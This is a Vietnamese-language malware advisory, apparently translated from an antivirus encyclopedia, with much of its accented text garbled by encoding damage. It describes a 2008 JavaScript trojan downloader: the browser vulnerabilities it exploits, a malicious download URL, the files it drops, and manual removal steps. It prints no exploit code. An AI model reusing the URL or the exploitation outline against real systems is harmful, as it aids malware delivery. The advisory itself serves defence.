Ng�y ph�t hi?n: 13 ? 05 ? 2008
Hi?m h?a: TrojanDownloader
N?n t?ng: JS
Trojan n�y download m?t ch??ng tr�nh kh�c th�ng qua Internet v� kh?i ch?y n� tr�n m�y t�nh n?n nh�n m� ng??i d�ng m�y kh�ng h? bi?t hay cho ph�p. N� m� h�a Java Script trong m?t t�i li?u HTML. Dung l??ng c?a n� l� 14147 byte.
Ho?t ??ng :
Khi trang b? nhi?m ??c ???c m? ra b?ng tr�nh duy?t web, ng??i d�ng s? nh?n ???c m?t th�ng b�o:
Not Found
The requested URL / was not found on this server.
Trojan sau ?� gi?i m� ch�nh b?n th�n n� v� kh?i ch?y k?ch b?n m� ??c ?? th?c thi. N� s? s? d?ng c�c l? h?ng ???c li?t k� sau ?�y:
1. l?i tr�n b? ??m trong ?i?u khi?n ActiveX Live Picture Corporation DXSurface.LivePicture.FlashPix.1 trong DXTLIPI.DLL khi x? l� "SourceUrl()" (CVE-2007-4336)
2. trong plug-in c?a Windows Media Player khi x? l� m?t tham s? ?src? qu� d�i trong th? "embed" (MS06-006). L? h?ng n�y hi?n di?n khi plug-in ???c kh?i ch?y trong c�c tr�nh duy?t kh�ng ph?i IE.
3. Trong ??i t??ng QuickTime.QuickTime" ActiveX (CVE-2004-0431);
?? download m?t file c� t�n "ldr.exe" t? URL sau:
http://java62.com/load.php****
File download v? n�y c� dung l??ng 48640 byte. N� s? ???c ph�t hi?n b?i Kaspersky Anti-Virus nh? virus Backdoor.Win32.Agent.ich. File n�y s? ???c l?u v�o th? m?c h? th?ng Windows d??i t�n:
%System%~.exe
File n�y sau ?� kh?i ch?y qu� tr�nh th?c thi. Trojan s? s? d?ng ??i t??ng ActiveX "Msxml2.XMLHTTP" v� c�c ??i t??ng c� ??nh danh duy nh?t trong h? th?ng:
{BD96C556-65A3-11D0-983A-00C04FC29E30}
{BD96C556-65A3-11D0-983A-00C04FC29E36}
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}
{0006F033-0000-0000-C000-000000000046}
{0006F03A-0000-0000-C000-000000000046}
{6E32070A-766D-4EE6-879C-DC1FA91D2FC3}
{6414512B-B978-451D-A0D8-FCFDF33E833C}
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}
{06723E09-F4C2-43C8-8358-09FCD1DB0766}
{639F725F-1B2D-4831-A9FD-874847682010}
{BA018599-1DB3-44F9-83B4-461454C84BF8}
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}
{E8CCCDDF-CA28-496B-B050-6C07C962476B}
?? download m?t file c� t�n g?i "ldr.exe" t? ???ng d?n sau:
http://java62.com/load.php?MSIE
N� s? d?ng ??i t??ng ActiveX "ADODB.Stream" ?? l?u file n�y d??i t�n:
c:sys.exe
v� b?n k� t? ??ng sau nh? v� d? sau:
syskmtz.exe
syskqoq.exe
File ???c download v? sau ?� s? kh?i ch?y qu� tr�nh th?c thi.
H??ng d?n g? b?
N?u m�y t�nh c?a b?n kh�ng c� m?t ch??ng tr�nh di?t virus t? ??ng c?p nh?t, ho?c kh�ng c� m?t gi?i ph�p di?t virus to�n v?n, h�y th?c hi?n theo c�c h??ng d?n sau ?? x�a b? m� ??c kh?i m�y t�nh:
1. X�a file g?c c?a Trojan (v? tr� file t�y thu?c v�o c�ch n� x�m nh?p ban ??u v�o m�y t�nh n?n nh�n).
2. X�a c�c file sau:
%System%~.exe
c:sys.exe
3. V� hi?u h�a c�c ??i t??ng ActiveX b? l? h?ng
4. C�i ??t c�c b?n v� b?o m?t sau:
http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx
5. C�i ??t phi�n b?n m?i nh?t c?a QuickTime.
6. C?p nh?t c? s? d? li?u virus v� th?c hi?n qu�t to�n b? m�y t�nh.
Đăng nhận xét